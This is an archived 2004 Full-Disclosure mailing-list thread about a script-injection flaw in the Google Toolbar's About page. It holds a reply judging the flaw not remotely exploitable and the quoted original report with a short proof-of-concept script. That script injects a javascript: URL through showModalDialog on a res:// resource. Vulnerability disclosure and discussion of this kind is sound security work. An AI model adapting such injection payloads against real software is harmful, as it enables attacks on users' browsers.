Network Security: Detailed info on [Full-Disclosure] Re: GoogleToolbar:About -- Allows Script Injection

Subject:	[Full-Disclosure] Re: GoogleToolbar:About -- Allows Script Injection
Date:	Sat, 18 Sep 2004 19:31:15 +0200

Subject:

[Full-Disclosure] Re: GoogleToolbar:About -- Allows Script Injection

Date:

Sat, 18 Sep 2004 19:31:15 +0200

This is not dangerous from remote, because the "res:" protocol is not
accessible by internet zone. You must to find a way to access  "res:" from
remote, otherwise it means nothing. As for local zone, you can ran scripts
in mycomputer zone.


Rafel Ivgi, The-Insider
Security Consultant, Finjan.com

----- Original Message ----- 
From: "ViPeR" <viper31337@yahoo.co.in>
To: <news@securiteam.com>; <bugtraq@securityfocus.com>;
<bugs@securitytracker.com>; <vulnwatch@vulnwatch.org>;
<vuln@security.nnov.ru>; <sec-adv@secunia.com>;
<submissions@packetstormsecurity.org>
Sent: Friday, September 17, 2004 10:51 AM
Subject: GoogleToolbar:About -- Allows Script Injection


Affection Software : GoogleToolbar
Version : Tested on 2.0.114.1-big/en (GGLD)

Notes:
GoogleToolbar's About section allows injection of
script, since it lacks any checking. The following
code is a Proof Of Concept.

<s c r i p t>
window.showModalDialog("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dl
l/ABOUT.HTML",
"<div style=\"background-image:
url(javascript:alert(location.href));\">");
</s c r i p t>

rgds,
Gregory R. Panakkal / Viper


________________________________________________________________________
Yahoo! India Matrimony: Find your life partner online
Go to: http://yahoo.shaadi.com/india-matrimony

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

<Prev in Thread]	Current Thread	[Next in Thread>
GoogleToolbar:About -- Allows Script Injection, ViPeR [Full-Disclosure] Re: GoogleToolbar:About -- Allows Script Injection, Rafel Ivgi, The-Insider <= [Full-Disclosure] Re: GoogleToolbar:About -- Allows Script Injection, Liu Die Yu

Previous by Date:	[Full-Disclosure] RE: Vulnerability in IBM Windows XP: default hidden Administrator account allows local Administrator access, Michael Scheidell
Next by Date:	[Full-Disclosure] Re: Vulnerability in IBM Windows XP: default hidden Administrator account allows local Administrator access, Shawn McMahon
Previous by Thread:	GoogleToolbar:About -- Allows Script Injection, ViPeR
Next by Thread:	[Full-Disclosure] Re: GoogleToolbar:About -- Allows Script Injection, Liu Die Yu
Indexes:	[Date] [Thread] [Top] [All Lists]

Previous by Date:

[Full-Disclosure] RE: Vulnerability in IBM Windows XP: default hidden Administrator account allows local Administrator access, Michael Scheidell

Next by Date:

[Full-Disclosure] Re: Vulnerability in IBM Windows XP: default hidden Administrator account allows local Administrator access, Shawn McMahon

Previous by Thread:

GoogleToolbar:About -- Allows Script Injection, ViPeR

Next by Thread:

[Full-Disclosure] Re: GoogleToolbar:About -- Allows Script Injection, Liu Die Yu

Indexes:

[Date] [Thread] [Top] [All Lists]